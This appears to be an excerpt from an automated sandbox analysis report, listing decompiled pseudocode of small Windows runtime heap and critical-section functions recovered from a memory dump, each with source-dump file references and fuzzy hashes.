                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 88%
                        			E02BB746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
                        				signed int _t8;
                        				void* _t10;
                        				short* _t17;
                        				void* _t19;
                        				intOrPtr _t20;
                        				void* _t21;
                        
                        				_t20 = __esi;
                        				_t19 = __edi;
                        				_t17 = __ebx;
                        				if( *((char*)(_t21 - 0x25)) != 0) {
                        					if(__ecx == 0) {
                        						E02BAEB70(__ecx, 0x2c879a0);
                        					} else {
                        						asm("lock xadd [ecx], eax");
                        						if((_t8 | 0xffffffff) == 0) {
                        							_push( *((intOrPtr*)(__ecx + 4)));
                        							E02BD95D0();
                        							L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
                        							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
                        							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
                        						}
                        					}
                        					L10:
                        				}
                        				_t10 = _t19 + _t19;
                        				if(_t20 >= _t10) {
                        					if(_t19 != 0) {
                        						 *_t17 = 0;
                        						return 0;
                        					}
                        				}
                        				return _t10;
                        				goto L10;
                        			}










                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02BCA44B(signed int __ecx) {
                        				intOrPtr _t13;
                        				signed int _t15;
                        				signed int* _t16;
                        				signed int* _t17;
                        
                        				_t13 =  *0x2c87b9c; // 0x0
                        				_t15 = __ecx;
                        				_t16 = L02BB4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
                        				if(_t16 == 0) {
                        					return 0;
                        				}
                        				 *_t16 = _t15;
                        				_t17 =  &(_t16[2]);
                        				E02BDFA60(_t17, 0, _t15 << 2);
                        				return _t17;
                        			}








                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 79%
                        			E02B9F358(void* __ecx, signed int __edx) {
                        				char _v8;
                        				signed int _t9;
                        				void* _t20;
                        
                        				_push(__ecx);
                        				_t9 = 2;
                        				_t20 = 0;
                        				if(E02BCF3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
                        					_t20 = L02BB4620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                        				}
                        				return _t20;
                        			}







                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02BAFF60(intOrPtr _a4) {
                        				void* __ecx;
                        				void* __ebp;
                        				void* _t13;
                        				intOrPtr _t14;
                        				void* _t15;
                        				void* _t16;
                        				void* _t17;
                        
                        				_t14 = _a4;
                        				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x2b711a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                        					return E02C688F5(_t13, _t14, _t15, _t16, _t17, __eflags);
                        				} else {
                        					return E02BB0050(_t14);
                        				}
                        			}











                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02C4D380(void* __ecx, void* __edx, intOrPtr _a4) {
                        				void* _t5;
                        
                        				if(_a4 != 0) {
                        					_t5 = L02B9E8B0(__ecx, _a4, 0xfff);
                        					L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                        					return _t5;
                        				}
                        				return 0xc000000d;
                        			}





                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 82%
                        			E02C241E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                        				void* _t5;
                        				void* _t14;
                        
                        				_push(8);
                        				_push(0x2c708f0);
                        				_t5 = E02BED08C(__ebx, __edi, __esi);
                        				if( *0x2c887ec == 0) {
                        					E02BAEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                        					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
                        					if( *0x2c887ec == 0) {
                        						 *0x2c887f0 = 0x2c887ec;
                        						 *0x2c887ec = 0x2c887ec;
                        						 *0x2c887e8 = 0x2c887e4;
                        						 *0x2c887e4 = 0x2c887e4;
                        					}
                        					 *(_t14 - 4) = 0xfffffffe;
                        					_t5 = L02C24248();
                        				}
                        				return E02BED0D1(_t5);
                        			}






                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02BCA185() {
                        				void* __ecx;
                        				intOrPtr* _t5;
                        
                        				if( *0x2c867e4 >= 0xa) {
                        					if(_t5 < 0x2c86800 || _t5 >= 0x2c86900) {
                        						return L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
                        					} else {
                        						goto L1;
                        					}
                        				} else {
                        					L1:
                        					return E02BB0010(0x2c867e0, _t5);
                        				}
                        			}






                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02BC16E0(void* __edx, void* __eflags) {
                        				void* __ecx;
                        				void* _t3;
                        
                        				_t3 = E02BC1710(0x2c867e0);
                        				if(_t3 == 0) {
                        					_t6 =  *[fs:0x30];
                        					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
                        						goto L1;
                        					} else {
                        						return L02BB4620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
                        					}
                        				} else {
                        					L1:
                        					return _t3;
                        				}
                        			}






                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 09a793a6ad4a6594cd7fa425dfd177a52deb1450f4739ed779b964aa4da9049e
                        • Instruction ID: e75709a7c2d4dbe4e0debc26e7c202747d2e5ff404edac7997bc79c7f813f684
                        • Opcode Fuzzy Hash: 09a793a6ad4a6594cd7fa425dfd177a52deb1450f4739ed779b964aa4da9049e
                        • Instruction Fuzzy Hash: 58D0A77111010052DA2D6F189814B152256EB80B89F3800FCF10FA94C2CFB0CC92E448
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02C153CA(void* __ebx) {
                        				intOrPtr _t7;
                        				void* _t13;
                        				void* _t14;
                        				intOrPtr _t15;
                        				void* _t16;
                        
                        				_t13 = __ebx;
                        				if( *((char*)(_t16 - 0x65)) != 0) {
                        					E02BAEB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                        					_t7 =  *((intOrPtr*)(_t16 - 0x64));
                        					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
                        				}
                        				if(_t15 != 0) {
                        					L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
                        					return  *((intOrPtr*)(_t16 - 0x64));
                        				}
                        				return _t7;
                        			}









                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                        • Instruction ID: 932bd4c71197c67ba46fd8f1bb1df360389eb89fec5af2d07e9f4c5608beffc6
                        • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                        • Instruction Fuzzy Hash: 7DE08C32A046809BCF12DB49C6A0F5EB7F6FBC5B40F540094A0086F620C764ED00DB40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02BAAAB0() {
                        				intOrPtr* _t4;
                        
                        				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                        				if(_t4 != 0) {
                        					if( *_t4 == 0) {
                        						goto L1;
                        					} else {
                        						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
                        					}
                        				} else {
                        					L1:
                        					return 0x7ffe0030;
                        				}
                        			}





                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                        • Instruction ID: b72ed326e42b0c80a2a80ad9d26013fca2646479c1cec6d53dd4bab1ced1d622
                        • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                        • Instruction Fuzzy Hash: 34D0C235252A80CFD65A9B59C564B1573A4FB44A44FC504D0E9058B661E728D954CA10
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02BC35A1(void* __eax, void* __ebx, void* __ecx) {
                        				void* _t6;
                        				void* _t10;
                        				void* _t11;
                        
                        				_t10 = __ecx;
                        				_t6 = __eax;
                        				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
                        					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
                        				}
                        				if( *((char*)(_t11 - 0x1a)) != 0) {
                        					return E02BAEB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                        				}
                        				return _t6;
                        			}







                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                        • Instruction ID: 2f6507b817b75fb5e94e9cd595262fbfc2921ba9cf9c9a09c7b1a5e222c39d31
                        • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                        • Instruction Fuzzy Hash: E1D0C9315561849EDB51AB60C26876877F2FB0021CFF8A0ED944616953C33E8A5ADA41
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02B9DB40() {
                        				signed int* _t3;
                        				void* _t5;
                        
                        				_t3 = L02BB4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
                        				if(_t3 == 0) {
                        					return 0;
                        				} else {
                        					 *_t3 =  *_t3 | 0x00000400;
                        					return _t3;
                        				}
                        			}






                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                        • Instruction ID: b3f1d918583f2c34b0c8a846116b6fb7c68c6a98f68dea31d10ca834a4b3ebf5
                        • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                        • Instruction Fuzzy Hash: 20C08C30290A01AAEB222F20CD01B5036A1FB00B05F4400E0A301DA0F0DBB8D801EA00
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02C1A537(intOrPtr _a4, intOrPtr _a8) {
                        
                        				return L02BB8E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
                        			}



                        0x02c1a553

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                        • Instruction ID: 6d7747a604085a26c5093a357f0805b1ee672a90b472cee710487db6878c1f50
                        • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                        • Instruction Fuzzy Hash: 86C01236080248BBCB136E81CC01F567B2AEB94B60F008010BA080A5608672E970EA84
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02BB3A1C(intOrPtr _a4) {
                        				void* _t5;
                        
                        				return L02BB4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                        			}




                        0x02bb3a35

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                        • Instruction ID: e2638550d7d3bceea8594b22846a771e10a70b88550d43695dbe7562dbcf7cfa
                        • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                        • Instruction Fuzzy Hash: 03C08C32080648BBC7126E41DC00F117B2AEB90B60F000060B6040A5618572EC60D988
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02BA76E2(void* __ecx) {
                        				void* _t5;
                        
                        				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
                        					return L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                        				}
                        				return _t5;
                        			}





                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                        • Instruction ID: 56bdb818bb1385ee47904cdf77228328fe216d6a3fa8d6064a4544bdd3753013
                        • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                        • Instruction Fuzzy Hash: D3C08C711491C05AEB2A570CCE30B38B650EF08708F4801DCAA010D8A1CBA8A806E688
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02BC36CC(void* __ecx) {
                        
                        				if(__ecx > 0x7fffffff) {
                        					return 0;
                        				} else {
                        					return L02BB4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                        				}
                        			}




                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                        • Instruction ID: d74fbf1fac531db75aed45ba10a48a8c8fc59e5b7b09809a88885ae3ef43e075
                        • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                        • Instruction Fuzzy Hash: B0C09BB5155840BBD7166F30CD51F6572A5FB40B61FB407E87221455F1D6799C00D504
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02B9AD30(intOrPtr _a4) {
                        
                        				return L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                        			}



                        0x02b9ad49

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                        • Instruction ID: 143084bf928b0ae52e5687aaf2a57765b78a89b03304a5fc5a56d96840decde9
                        • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                        • Instruction Fuzzy Hash: EFC08C33080288BBC7126A46CD00F11BB2AEB90B60F000020B6040AA618972E860E988
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02BB7D50() {
                        				intOrPtr* _t3;
                        
                        				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                        				if(_t3 != 0) {
                        					return  *_t3;
                        				} else {
                        					return _t3;
                        				}
                        			}





                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                        • Instruction ID: babf66837cf88a262bc2b24c773d5200ede656503b74f963429cdf70f3faef48
                        • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                        • Instruction Fuzzy Hash: C6B092353019408FCF16DF18C080B6573E4FB84A80F8400D4E400CBA20D729E8009900
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02BC2ACB() {
                        				void* _t5;
                        
                        				return E02BAEB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                        			}




                        0x02bc2adc

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                        • Instruction ID: 2aaabe7a737c4a0b49cb32df75dc3ce9c496802e63ff79f3d5f408eda04c52a3
                        • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                        • Instruction Fuzzy Hash: EFB092328124408BCF02AB40C660A197372AB00750F0544A09001279208228AC01CA40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 53%
                        			E02C2FDDA(intOrPtr* __edx, intOrPtr _a4) {
                        				void* _t7;
                        				intOrPtr _t9;
                        				intOrPtr _t10;
                        				intOrPtr* _t12;
                        				intOrPtr* _t13;
                        				intOrPtr _t14;
                        				intOrPtr* _t15;
                        
                        				_t13 = __edx;
                        				_push(_a4);
                        				_t14 =  *[fs:0x18];
                        				_t15 = _t12;
                        				_t7 = E02BDCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                        				_push(_t13);
                        				E02C25720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                        				_t9 =  *_t15;
                        				if(_t9 == 0xffffffff) {
                        					_t10 = 0;
                        				} else {
                        					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                        				}
                        				_push(_t10);
                        				_push(_t15);
                        				_push( *((intOrPtr*)(_t15 + 0xc)));
                        				_push( *((intOrPtr*)(_t14 + 0x24)));
                        				return E02C25720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                        			}











                        APIs
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02C2FDFA
                        Strings
                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02C2FE2B
                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02C2FE01
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                        • API String ID: 885266447-3903918235
                        • Opcode ID: 0a7288046754a48b25eeb31d504020975160531984f6e1507dcb819ce6994a75
                        • Instruction ID: 390100ab9160051215bdbca785b3ac41a79b3dd9887a5a3a402ed3d1083cb4ca
                        • Opcode Fuzzy Hash: 0a7288046754a48b25eeb31d504020975160531984f6e1507dcb819ce6994a75
                        • Instruction Fuzzy Hash: 3CF0C272240251BBE6252A55DC02E33BB6AEB44B70F140255FA28565E1EE62B820DAA0
                        Uniqueness

                        Uniqueness Score: -1.00%